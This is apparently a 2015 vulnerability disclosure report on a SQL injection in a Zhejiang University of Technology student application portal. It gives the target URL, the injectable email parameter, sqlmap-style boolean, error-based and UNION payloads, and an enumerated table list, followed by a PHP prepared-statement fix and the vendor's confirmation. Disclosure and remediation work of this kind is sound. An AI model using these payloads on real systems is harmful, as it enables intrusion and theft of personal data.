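2015-10-27: Details reported to the vendor; awaiting vendor response
2015-10-27: Vendor confirmed; details disclosed to the vendor only
2015-11-06: Details disclosed to core white hats and relevant domain experts
2015-11-16: Details disclosed to regular white hats
2015-11-26: Details disclosed to intern white hats
2015-12-11: Details disclosed to the public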
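SQL injection vulnerability in a Zhejiang University of Technology system
http://www.apply.zjut.edu.cn/en/student/login/fpassword (POST)
findpassword=Reset Password&code=Verification Code&email=1'
The email parameter is injectable.
The database holds a large amount of international student information.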
Place: POST
Parameter: email
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: findpassword=Reset Password&code=Verification Code&email=-5404%' OR (6778=6778)#

    Type: error-based
    Title: MySQL OR error-based - WHERE or HAVING clause
    Payload: findpassword=Reset Password&code=Verification Code&email=-6171%' OR 1 GROUP BY CONCAT(0x7161716371,(SELECT (CASE WHEN (9966=9966) THEN 1 ELSE 0 END)),0x71766f7771,FLOOR(RAND(0)*2)) HAVING MIN(0)#

    Type: UNION query
    Title: MySQL UNION query (random number) - 35 columns
    Payload: findpassword=Reset Password&code=Verification Code&email=-5577%' UNION ALL SELECT 3639,3639,3639,3639,3639,3639,3639,CONCAT(0x7161716371,0x4b64794b4b486c596d43,0x71766f7771),3639,3639,3639,3639,3639,3639,3639,3639,3639,3639,3639,3639,3639,3639,3639,3639,3639,3639,3639,3639,3639,3639,3639,3639,3639,3639,3639#
---
web application technology: Apache 2.4.12, PHP 5.5.24
back-end DBMS: MySQL 5
Database: apply
+------------------------------------------+---------+
| Table                                    | Entries |
+------------------------------------------+---------+
| cucas_formitem                           | 30517   |
| cucas_apply_template_info                | 22935   |
| cucas_formtopic                          | 14093   |
| cucas_attachmentstopic                   | 6515    |
| cucas_apply_history                      | 5081    |
| cucas_templateclass                      | 4090    |
| cucas_apply_attachment_info              | 1628    |
| cucas_admin_logs                         | 969     |
| cucas_system_group_menu                  | 927     |
| cucas_student_info                       | 660     |
| cucas_apply_info                         | 439     |
| cucas_app_log                            | 373     |
| cucas_major                              | 248     |
| cucas_apply_order_info                   | 174     |
| cucas_budget                             | 174     |
| cucas_deposit_info                       | 169     |
| cucas_app_getoffer                       | 161     |
| cucas_print_fields                       | 159     |
| cucas_message                            | 128     |
| cucas_message_record                     | 84      |
| cucas_user_message                       | 84      |
| cucas_school_accommodation_prices        | 82      |
| cucas_credentials                        | 69      |
| cucas_mail_record                        | 54      |
| cucas_applyscholarship_info              | 52      |
| cucas_admin_info                         | 26      |
| cucas_category_info                      | 26      |
| cucas_message_log                        | 24      |
| cucas_mail_dot                           | 23      |
| cucas_pages_info                         | 20      |
| cucas_print_template                     | 19      |
| cucas_faculty                            | 18      |
| cucas_buliding_floor_room                | 17      |
| cucas_user_room                          | 16      |
| cucas_theme_file                         | 15      |
| cucas_major_course                       | 11      |
| cucas_system_group                       | 11      |
| cucas_agency_info                        | 9       |
| cucas_quarterage_info                    | 8       |
| cucas_module_info                        | 7       |
| cucas_room_electric_user                 | 7       |
| cucas_ppt_info                           | 6       |
| cucas_insurance_info                     | 5       |
| cucas_room_electric_record               | 5       |
| cucas_school_accommodation_campus_info   | 5       |
| cucas_attachments                        | 4       |
| cucas_degree_info                        | 4       |
| cucas_scholarship_info                   | 4       |
| cucas_school_accommodation_buliding      | 4       |
| cucas_theme_info                         | 4       |
| cucas_commission_record                  | 3       |
| cucas_school_accommodation_buliding_info | 3       |
| cucas_image_info                         | 2       |
| cucas_landlord_info                      | 2       |
| cucas_major_content                      | 2       |
| cucas_major_images                       | 2       |
| cucas_major_pl                           | 2       |
| cucas_notice_info                        | 2       |
| cucas_out_room                           | 2       |
| cucas_school_accommodation_campus        | 2       |
| cucas_school_accommodation_prices_info   | 2       |
| cucas_test_paper                         | 2       |
| cucas_paypal                             | 1       |
| cucas_pickup_info                        | 1       |
| cucas_question_info                      | 1       |
+------------------------------------------+---------+
Validate and filter the parameter.
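One way to apply that fix to the reset-password lookup, as an added example that is not the application's code: the email value is validated, then passed as a bound parameter, and database errors are kept out of the response. The table student_account, its columns and the sample row are hypothetical, and in-memory SQLite stands in for MySQL so the block runs offline.

```php
<?php
// Added example, not the application's code. The table "student_account",
// its columns and the sample row are hypothetical (constructed).

function find_account_id(PDO $pdo, $rawEmail)
{
    // Validate first. A valid address may still contain an apostrophe
    // (o'brien@example.org), so this check does not replace binding.
    $email = filter_var(trim((string) $rawEmail), FILTER_VALIDATE_EMAIL);
    if ($email === false || strlen($email) > 254) {
        return null;
    }
    try {
        // Bound parameter: the value is sent as data, never spliced into SQL.
        // Exact match on one named column rather than a pattern or SELECT *.
        $stmt = $pdo->prepare(
            'SELECT id FROM student_account WHERE email = :email LIMIT 1'
        );
        $stmt->execute([':email' => $email]);
        $row = $stmt->fetch(PDO::FETCH_ASSOC);
        return $row === false ? null : (int) $row['id'];
    } catch (PDOException $e) {
        // Log server-side only; database errors echoed into the page are
        // what the error-based technique in the report reads.
        error_log('reset lookup failed: ' . $e->getMessage());
        return null;
    }
}

// SQLite in memory stands in for MySQL (assumption: pdo_sqlite is installed).
// With the MySQL driver, also set PDO::ATTR_EMULATE_PREPARES => false so the
// server prepares the statement itself.
$pdo = new PDO('sqlite::memory:', null, null, [
    PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION,
]);
$pdo->exec('CREATE TABLE student_account (id INTEGER PRIMARY KEY, email TEXT UNIQUE)');
$pdo->exec("INSERT INTO student_account (email) VALUES ('student@example.org')");

// Inputs: a registered address, the probe and one payload value from the
// report, and a valid address that contains a quote.
$inputs = ['student@example.org', "1'", "-5404%' OR (6778=6778)#", "o'brien@example.org"];
foreach ($inputs as $in) {
    $id = find_account_id($pdo, $in);
    // Internal result, shown for the demo only. The HTTP response should carry
    // one fixed message for hit and miss so it is not a true/false oracle.
    printf("%-26s %s\n", $in, $id === null ? 'miss' : 'hit');
}
```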
Severity: Medium
Vulnerability Rank: 9
Confirmed at: 2015-10-27 16:54
Thank you for your help; we will handle this as soon as possible.
None yet